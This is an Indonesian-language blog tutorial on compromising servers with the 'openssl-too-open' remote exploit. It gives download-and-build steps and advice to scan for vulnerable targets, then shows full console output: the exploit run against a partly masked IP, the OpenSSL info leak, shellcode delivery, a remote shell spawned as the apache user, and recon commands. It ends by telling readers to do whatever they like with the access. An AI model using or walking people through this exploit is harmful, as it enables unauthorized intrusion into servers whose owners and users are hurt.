1. Download openssl-too-open.tar.gz bisa download dimana aja :)
2. Extract File tersebut
3. Kemudian Make dan Siap di jalankan
Terlebih dahulu yg harus anda lakukan adalah scanning
terhadap server target apakah vulnerable kalo vulnerable
kemungkinan bisa di bobol ok di bawah ini hasil server
yg telah di bobol
[iwan@server1 openssl]$ ./ssl -a 0x08 -v 2xx.xx.xx.xx
: openssl-too-open : OpenSSL remote exploit
Modified by Escuver & Antihackerlink Crew
: Opening 30 connections
Establishing SSL connections
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0x8324180
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0x8324180
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0x8324180
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0x8324180 start_addr: 0x83240c0 SHELLCODE_OFS:
208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.04$
bash-2.04$ uname -a; id; w;
Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30
EDT 2001 i686 unknown uid=48(apache) gid=48(apache)
groups=48(apache) 12:01am up 10 days, 8:00,
0 users, load average: 0.24, 0.22, 0.18
USER TTY FROM
LOGIN@ IDLE JCPU PCPU WHAT
bash-2.04$
bash-2.04$
Setelah dapet terserah anda mau diapakan :p oke see yahh tunggu
tutorial saya yg berikut nya :) Salam silent Java Hackerlink
Tutorial Present by Dedhy_BlackHacking
Tidak ada komentar:
Posting Komentar